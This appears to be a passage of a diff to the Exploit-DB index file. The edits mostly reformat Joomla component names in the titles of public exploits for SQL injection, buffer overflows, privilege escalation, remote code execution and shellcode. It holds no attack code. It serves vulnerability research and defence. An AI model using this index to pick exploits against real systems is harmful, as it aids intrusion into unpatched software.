37768,platforms/windows/local/37768.txt,"Microsoft Windows 8.1 - DCOM DCE/RPC Local NTLM Reflection Privilege Escalation (MS15-076)",2015-08-13,monoxgas,windows,local,0 37769,platforms/php/webapps/37769.txt,"Gkplugins Picasaweb - Download File",2015-08-15,"TMT zno",php,webapps,0 37770,platforms/hardware/webapps/37770.txt,"TOTOLINK Routers - Backdoor and Remote Code Execution (PoC)",2015-08-15,MadMouse,hardware,webapps,0 37771,platforms/windows/local/37771.py,"Microsoft HTML Help Compiler 4.74.8702.0 - SEH Based Overflow",2015-08-15,St0rn,windows,local,0 37772,platforms/multiple/local/37772.js,"Mozilla Firefox < 39.03 - 'pdf.js' Same Origin Policy Exploit",2015-08-15,"Tantaryu MING",multiple,local,0 -37773,platforms/php/webapps/37773.txt,"Joomla! Component com_memorix - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 -37774,platforms/php/webapps/37774.txt,"Joomla! Component com_informations - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 +37773,platforms/php/webapps/37773.txt,"Joomla! Component 'com_memorix' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 +37774,platforms/php/webapps/37774.txt,"Joomla! Component 'com_informations' - SQL Injection",2015-08-15,"BM Cloudx",php,webapps,0 37775,platforms/windows/dos/37775.py,"Ability FTP Server 2.1.4 - afsmain.exe USER Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0 37776,platforms/windows/dos/37776.py,"Ability FTP Server 2.1.4 - Admin Panel AUTHCODE Command Remote Denial of Service",2015-08-15,St0rn,windows,dos,0 37777,platforms/linux/dos/37777.txt,"NetKit FTP Client (Ubuntu 14.04) - Crash/Denial of Service (PoC)",2015-08-15,"TUNISIAN CYBER",linux,dos,0 @@ -34411,7 +34411,7 @@ id,file,description,date,author,platform,type,port 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload / Execution",2015-08-28,"Narendra Bhati",php,webapps,80 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80 -38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 +38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - 'GET' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80 38005,platforms/windows/remote/38005.asp,"MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer Exploit",2015-08-29,ylbhz,windows,remote,0 38006,platforms/php/webapps/38006.txt,"BloofoxCMS 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-10-31,"Canberk BOLAT",php,webapps,0 @@ -34421,7 +34421,7 @@ id,file,description,date,author,platform,type,port 38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0 38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 38012,platforms/php/webapps/38012.txt,"WordPress Plugin FLV Player - 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 -38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 +38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager - (AWCM) cookie_gen.php Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps,0 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0 @@ -34825,7 +34825,7 @@ id,file,description,date,author,platform,type,port 38442,platforms/php/dos/38442.txt,"PHPMyLicense 3.0.0 < 3.1.4 - Denial of Service",2015-10-11,"Aria Akhavan Rezayat",php,dos,0 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush Application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 -38445,platforms/php/webapps/38445.txt,"Joomla! Component Real Estate Manager 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0 +38445,platforms/php/webapps/38445.txt,"Joomla! Component 'com_realestatemanager' 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0 38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 @@ -34902,8 +34902,8 @@ id,file,description,date,author,platform,type,port 38524,platforms/php/webapps/38524.pl,"Matterdaddy Market - Multiple Security Vulnerabilities",2013-05-24,KedAns-Dz,php,webapps,0 38525,platforms/php/webapps/38525.txt,"Subrion 3.X.x - Multiple Vulnerabilities",2015-10-23,bRpsd,php,webapps,0 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0 -38527,platforms/php/webapps/38527.txt,"Joomla! Extension Realtyna RPL 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",php,webapps,0 -38528,platforms/php/webapps/38528.txt,"Joomla! Extension Realtyna RPL 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",php,webapps,0 +38527,platforms/php/webapps/38527.txt,"Joomla! Component 'com_rpl' 8.9.2 - Multiple SQL Injections",2015-10-23,"Bikramaditya Guha",php,webapps,0 +38528,platforms/php/webapps/38528.txt,"Joomla! Component 'com_rpl' 8.9.2 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2015-10-23,"Bikramaditya Guha",php,webapps,0 38572,platforms/php/webapps/38572.txt,"PHP Server Monitor 3.1.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-10-30,hyp3rlinx,php,webapps,0 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR + DEP Bypass)",2015-10-25,g00dv1n,windows,local,0 38533,platforms/windows/local/38533.c,"Microsoft Windows 10 - pcap Driver Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 @@ -34935,7 +34935,7 @@ id,file,description,date,author,platform,type,port 38562,platforms/php/webapps/38562.txt,"HP Insight Diagnostics - Remote Code Injection",2013-06-10,"Markus Wulftange",php,webapps,0 38563,platforms/php/webapps/38563.txt,"HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion",2013-06-10,"Markus Wulftange",php,webapps,0 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash (PoC)",2015-10-29,"Luis Martínez",windows,dos,0 -38565,platforms/php/webapps/38565.txt,"Joomla! Component JNews (com_jnews) 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 +38565,platforms/php/webapps/38565.txt,"Joomla! Component 'com_jnews' 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38566,platforms/hardware/dos/38566.py,"NetUSB - Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 38567,platforms/php/webapps/38567.txt,"Max Forum - Multiple Security Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0 38568,platforms/php/webapps/38568.txt,"WordPress Theme Ambience - 'src' Parameter Cross-Site Scripting",2013-06-09,Darksnipper,php,webapps,0 @@ -35001,7 +35001,7 @@ id,file,description,date,author,platform,type,port 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38628,platforms/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0 38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Unauthenticated Remote Code Execution",2015-11-05,hhjj,php,webapps,0 -38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 +38642,platforms/php/webapps/38642.txt,"S9Y Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0 38634,platforms/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0 38635,platforms/php/webapps/38635.txt,"iVote - 'details.php' SQL Injection",2013-07-10,"Ashiyane Digital Security Team",php,webapps,0 @@ -35140,7 +35140,7 @@ id,file,description,date,author,platform,type,port 38782,platforms/php/webapps/38782.php,"WordPress Plugin SEO Watcher - 'ofc_upload_image.php' Arbitrary PHP Code Execution",2013-10-03,wantexz,php,webapps,0 38775,platforms/linux/local/38775.rb,"Chkrootkit - Privilege Escalation (Metasploit)",2015-11-20,Metasploit,linux,local,0 38776,platforms/cgi/webapps/38776.txt,"Cambium ePMP 1000 - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",cgi,webapps,0 -38777,platforms/php/webapps/38777.txt,"Joomla! Component JVideoClip - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 +38777,platforms/php/webapps/38777.txt,"Joomla! Component 'com_jvideoclip' - 'uid' Parameter SQL Injection",2013-09-21,SixP4ck3r,php,webapps,0 38778,platforms/linux/dos/38778.txt,"Blue Coat ProxySG 5.x - and Security Gateway OS Denial Of Service",2013-09-23,anonymous,linux,dos,0 38779,platforms/multiple/dos/38779.py,"Abuse HTTP Server - Remote Denial of Service",2013-09-30,"Zico Ekel",multiple,dos,0 38780,platforms/php/webapps/38780.txt,"Silverstripe CMS - Multiple HTML Injection Vulnerabilities",2013-09-23,"Benjamin Kunz Mejri",php,webapps,0 @@ -35158,7 +35158,7 @@ id,file,description,date,author,platform,type,port 38794,platforms/windows/dos/38794.txt,"Microsoft Windows Cursor - Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38795,platforms/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38796,platforms/windows/dos/38796.txt,"Microsoft Windows - Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 -38797,platforms/php/remote/38797.rb,"Joomla! Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80 +38797,platforms/php/remote/38797.rb,"Joomla! Component 'com_contenthistory' - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 38799,platforms/php/webapps/38799.txt,"Bilboplanet - 'auth.php' SQL Injection",2013-10-11,"Omar Kurt",php,webapps,0 38800,platforms/php/webapps/38800.txt,"FreeSMS - pages/crc_handler.php scheduleid Parameter SQL Injection",2013-09-27,"Sarahma Security",php,webapps,0 @@ -35174,7 +35174,7 @@ id,file,description,date,author,platform,type,port 38811,platforms/php/webapps/38811.txt,"WordPress Theme Daily Deal - Arbitrary File Upload",2013-10-23,DevilScreaM,php,webapps,0 38812,platforms/multiple/remote/38812.txt,"DELL Quest One Password Manager - CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote,0 38813,platforms/multiple/remote/38813.txt,"Apache Shindig - XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote,0 -38814,platforms/php/webapps/38814.php,"Joomla! Component Maian15 - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0 +38814,platforms/php/webapps/38814.php,"Joomla! Component 'com_maian15' - 'name' Parameter Arbitrary File Upload",2013-10-20,SultanHaikal,php,webapps,0 38815,platforms/lin_x86-64/shellcode/38815.c,"Linux/x86-64 - Polymorphic execve Shellcode (31 bytes)",2015-11-25,d4sh&r,lin_x86-64,shellcode,0 38816,platforms/jsp/webapps/38816.html,"JReport - 'dealSchedules.jsp' Cross-Site Request Forgery",2013-10-25,"Poonam Singh",jsp,webapps,0 38817,platforms/linux/local/38817.txt,"Poppler 0.14.3 - '/utils/pdfseparate.cc' Local Format String",2013-10-26,"Daniel Kahn Gillmor",linux,local,0 @@ -35296,7 +35296,7 @@ id,file,description,date,author,platform,type,port 38940,platforms/multiple/dos/38940.c,"VideoLAN VLC Media Player 1.1.11 - '.EAC3' File Denial of Service",2012-03-14,"Dan Fosco",multiple,dos,0 38941,platforms/php/webapps/38941.txt,"GoAutoDial CE 3.3 - Multiple Vulnerabilities",2015-12-12,R-73eN,php,webapps,0 38942,platforms/php/webapps/38942.txt,"SPAMINA Cloud Email Firewall - Directory Traversal",2013-10-03,"Sisco Barrera",php,webapps,0 -38943,platforms/php/webapps/38943.txt,"Joomla! Component Aclsfgpl - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0 +38943,platforms/php/webapps/38943.txt,"Joomla! Component 'com_aclsfgpl' - 'index.php' Arbitrary File Upload",2014-01-07,"TUNISIAN CYBER",php,webapps,0 38944,platforms/php/webapps/38944.txt,"Command School Student Management System - /sw/admin_grades.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38945,platforms/php/webapps/38945.txt,"Command School Student Management System - /sw/admin_terms.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 38946,platforms/php/webapps/38946.txt,"Command School Student Management System - /sw/admin_school_years.php id Parameter SQL Injection",2014-01-07,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -35317,7 +35317,7 @@ id,file,description,date,author,platform,type,port 38966,platforms/php/webapps/38966.txt,"WordPress Plugin Admin Management Xtended 2.4.0 - Privilege escalation",2015-12-14,"Kacper Szurek",php,webapps,80 39096,platforms/php/webapps/39096.txt,"i-doit Pro - 'objID' Parameter SQL Injection",2014-02-17,"Stephan Rickauer",php,webapps,0 39097,platforms/linux/remote/39097.txt,"Red Hat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote,0 -39098,platforms/php/webapps/39098.txt,"Joomla! Component Wire Immogest - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0 +39098,platforms/php/webapps/39098.txt,"Joomla! Component 'com_wire_immogest' - 'index.php' SQL Injection",2014-02-17,MR.XpR,php,webapps,0 39057,platforms/php/webapps/39057.txt,"Dell Kace 1000 Systems Management Appliance DS-2014-001 - Multiple SQL Injections",2014-01-13,"Rohan Stelling",php,webapps,0 38964,platforms/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102 39095,platforms/php/dos/39095.pl,"MyBB 1.6.12 - 'misc.php' Remote Denial of Service",2014-02-12,Amir,php,dos,0 @@ -35368,7 +35368,7 @@ id,file,description,date,author,platform,type,port 39013,platforms/php/webapps/39013.html,"Built2Go PHP Shopping - Cross-Site Request Forgery (Admin Password)",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39014,platforms/php/webapps/39014.txt,"EZGenerator - Local File Disclosure / Cross-Site Request Forgery",2014-01-08,"AtT4CKxT3rR0r1ST ",php,webapps,0 39015,platforms/php/webapps/39015.txt,"Atmail Webmail Server - Email Body HTML Injection",2014-01-14,"Zhao Liang",php,webapps,0 -39016,platforms/php/webapps/39016.txt,"Joomla! Component Almond Classifieds - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0 +39016,platforms/php/webapps/39016.txt,"Joomla! Component 'com_aclassfb' - Arbitrary File Upload",2014-01-10,DevilScreaM,php,webapps,0 39017,platforms/php/webapps/39017.txt,"Zen Cart 1.5.4 - Local File Inclusion",2015-12-17,"High-Tech Bridge SA",php,webapps,80 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0 39019,platforms/windows/dos/39019.txt,"Adobe Flash TextField.antiAliasType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0 @@ -35380,12 +35380,12 @@ id,file,description,date,author,platform,type,port 39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 39026,platforms/win_x86/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Dereference",2015-12-17,"Nils Sommer",win_x86,dos,0 39027,platforms/win_x86/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free",2015-12-17,"Nils Sommer",win_x86,dos,0 -39028,platforms/php/webapps/39028.txt,"Joomla! Extension Sexy Polling - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 +39028,platforms/php/webapps/39028.txt,"Joomla! Component 'com_sexypolling' - 'answer_id' Parameter SQL Injection",2014-01-16,"High-Tech Bridge",php,webapps,0 39029,platforms/php/webapps/39029.txt,"BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39030,platforms/php/webapps/39030.txt,"BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39031,platforms/php/webapps/39031.html,"BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin)",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 39032,platforms/php/webapps/39032.txt,"BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion",2014-01-17,"AtT4CKxT3rR0r1ST ",php,webapps,0 -39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection x-forwarded-for Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80 +39033,platforms/php/webapps/39033.py,"Joomla! 1.5 < 3.4.5 - Object Injection 'x-forwarded-for' Header Remote Code Execution",2015-12-18,"Andrew McNicol",php,webapps,80 39034,platforms/php/webapps/39034.html,"Ovidentia maillist Module 4.0 - Remote File Inclusion",2015-12-18,bd0rk,php,webapps,80 39035,platforms/win_x86-64/local/39035.txt,"Microsoft Windows 8.1 - 'win32k' Privilege Escalation (MS15-010)",2015-12-18,"Jean-Jamil Khalife",win_x86-64,local,0 39099,platforms/php/webapps/39099.txt,"Rhino - Cross-Site Scripting / Password Reset Security Bypass Vulnerabilities",2014-02-12,Slotleet,php,webapps,0 @@ -35439,7 +35439,7 @@ id,file,description,date,author,platform,type,port 39085,platforms/php/webapps/39085.txt,"Arastta 1.1.5 - SQL Injection",2015-12-23,"Curesec Research Team",php,webapps,80 39086,platforms/php/webapps/39086.txt,"PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery",2015-12-23,"Curesec Research Team",php,webapps,80 39087,platforms/php/webapps/39087.txt,"Singapore 0.9.9b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting",2014-02-05,"TUNISIAN CYBER",php,webapps,0 -39088,platforms/php/webapps/39088.txt,"Joomla! Plugin Projoom NovaSFH - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 +39088,platforms/php/webapps/39088.txt,"Joomla! Component 'com_novasfh' - 'upload.php' Arbitrary File Upload",2013-12-13,"Yuri Kramarz",php,webapps,0 39089,platforms/hardware/remote/39089.txt,"Netgear D6300B - /diag.cgi IPAddr4 Parameter Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote,0 39090,platforms/php/webapps/39090.php,"WordPress Theme Kiddo - Arbitrary File Upload",2014-02-05,"TUNISIAN CYBER",php,webapps,0 39091,platforms/php/dos/39091.pl,"WHMCS 5.12 - 'cart.php' Denial of Service",2014-02-07,Amir,php,dos,0 @@ -35483,7 +35483,7 @@ id,file,description,date,author,platform,type,port 39137,platforms/cgi/webapps/39137.txt,"Primo Interactive CMS - 'pcm.cgi' Remote Command Execution",2014-03-31,"Felipe Andrian Peixoto",cgi,webapps,0 39138,platforms/hardware/remote/39138.html,"ICOMM 610 Wireless Modem - Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote,0 39139,platforms/php/webapps/39139.txt,"PHPFox - Access Control Security Bypass",2014-04-05,"Wesley Henrique",php,webapps,0 -39140,platforms/php/webapps/39140.txt,"Joomla! Component Inneradmission - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 +39140,platforms/php/webapps/39140.txt,"Joomla! Component 'com_inneradmission' - 'index.php' SQL Injection",2014-04-08,Lazmania61,php,webapps,0 39141,platforms/php/webapps/39141.txt,"eazyCMS - 'index.php' SQL Injection",2014-04-09,Renzi,php,webapps,0 39142,platforms/jsp/webapps/39142.txt,"Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 39143,platforms/jsp/webapps/39143.txt,"Xangati - /servlet/Installer file Parameter Directory Traversal",2014-04-14,"Jan Kadijk",jsp,webapps,0 @@ -35633,7 +35633,7 @@ id,file,description,date,author,platform,type,port 39292,platforms/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote,0 40337,platforms/windows/local/40337.py,"MySQL 5.5.45 (x64) - Local Credentials Disclosure",2016-09-05,"Yakir Wizman",windows,local,0 39293,platforms/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",multiple,remote,0 -39294,platforms/php/webapps/39294.txt,"Joomla! Extension Spider Video Player - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 +39294,platforms/php/webapps/39294.txt,"Joomla! Component 'spidervideoplayer' - 'theme' Parameter SQL Injection",2014-08-26,"Claudio Viviani",php,webapps,0 39295,platforms/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote,0 39296,platforms/php/webapps/39296.txt,"WordPress Theme Urban City - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39297,platforms/php/webapps/39297.txt,"WordPress Theme Authentic - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 @@ -35834,7 +35834,7 @@ id,file,description,date,author,platform,type,port 39503,platforms/multiple/dos/39503.txt,"Wireshark - print_hex_data_buffer / print_packet Use-After-Free",2016-02-26,"Google Security Research",multiple,dos,0 39504,platforms/android/dos/39504.c,"Qualcomm Adreno GPU MSM Driver - perfcounter Query Heap Overflow",2016-02-26,"Google Security Research",android,dos,0 39505,platforms/linux/dos/39505.c,"Linux io_submit L2TP sendmsg - Integer Overflow",2016-02-26,"Google Security Research",linux,dos,0 -39506,platforms/php/webapps/39506.txt,"Joomla! Extension JSN Poweradmin 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 +39506,platforms/php/webapps/39506.txt,"Joomla! Component 'com_poweradmin' 2.3.0 - Multiple Vulnerabilities",2016-02-26,"RatioSec Research",php,webapps,80 39507,platforms/php/webapps/39507.txt,"WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80 39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0 39509,platforms/windows/dos/39509.txt,"Crouzet em4 soft 1.1.04 - '.pm4' Integer Division By Zero",2016-03-01,LiquidWorm,windows,dos,0 @@ -35911,7 +35911,7 @@ id,file,description,date,author,platform,type,port 39587,platforms/php/webapps/39587.txt,"iTop 2.2.1 - Cross-Site Request Forgery",2016-03-21,"High-Tech Bridge SA",php,webapps,80 39588,platforms/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",php,webapps,80 39589,platforms/php/webapps/39589.txt,"WordPress Plugin HB Audio Gallery Lite 1.0.0 - Arbitrary File Download",2016-03-22,CrashBandicot,php,webapps,80 -39590,platforms/php/webapps/39590.txt,"Joomla! Component Easy YouTube Gallery 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80 +39590,platforms/php/webapps/39590.txt,"Joomla! Component 'com_easy_youtube_gallery' 1.0.2 - SQL Injection",2016-03-22,"Persian Hack Team",php,webapps,80 39591,platforms/php/webapps/39591.txt,"WordPress Plugin Brandfolder 3.0 - Remote File Inclusion / Local File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 39592,platforms/php/webapps/39592.txt,"WordPress Plugin Dharma booking 2.38.3 - File Inclusion",2016-03-22,AMAR^SHG,php,webapps,80 39593,platforms/php/webapps/39593.txt,"WordPress Plugin Memphis Document Library 3.1.5 - Arbitrary File Download",2016-03-22,"Felipe Molina",php,webapps,80 @@ -36036,7 +36036,7 @@ id,file,description,date,author,platform,type,port 39726,platforms/hardware/webapps/39726.rb,"Gemtek CPE7000 - WLTCS-106 sysconf.cgi Unauthenticated Remote Command Execution (Metasploit)",2016-04-25,"Federico Scalco",hardware,webapps,443 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0 39728,platforms/lin_x86-64/shellcode/39728.py,"Linux/x86-64 - Bind Shell Shellcode (Generator)",2016-04-25,"Ajith Kp",lin_x86-64,shellcode,0 -39729,platforms/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win_x86,remote,21 +39729,platforms/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - 'RENAME' Command Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win_x86,remote,21 39730,platforms/ruby/webapps/39730.txt,"NationBuilder - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-04-25,LiquidWorm,ruby,webapps,443 39731,platforms/windows/shellcode/39731.c,"Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes)",2016-04-25,Fugu,windows,shellcode,0 39733,platforms/linux/dos/39733.py,"Rough Auditing Tool for Security (RATS) 2.3 - Crash (PoC)",2016-04-25,"David Silveiro",linux,dos,0 @@ -36181,7 +36181,7 @@ id,file,description,date,author,platform,type,port 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0 39965,platforms/php/webapps/39965.txt,"Tiki Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80 -39879,platforms/php/webapps/39879.txt,"Joomla! Extension SecurityCheck 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80 +39879,platforms/php/webapps/39879.txt,"Joomla! Component 'SecurityCheck' 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80 40463,platforms/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,cgi,webapps,0 @@ -36239,7 +36239,7 @@ id,file,description,date,author,platform,type,port 39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 -39936,platforms/php/webapps/39936.txt,"Joomla! Extension PayPlans (com_payplans) 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80 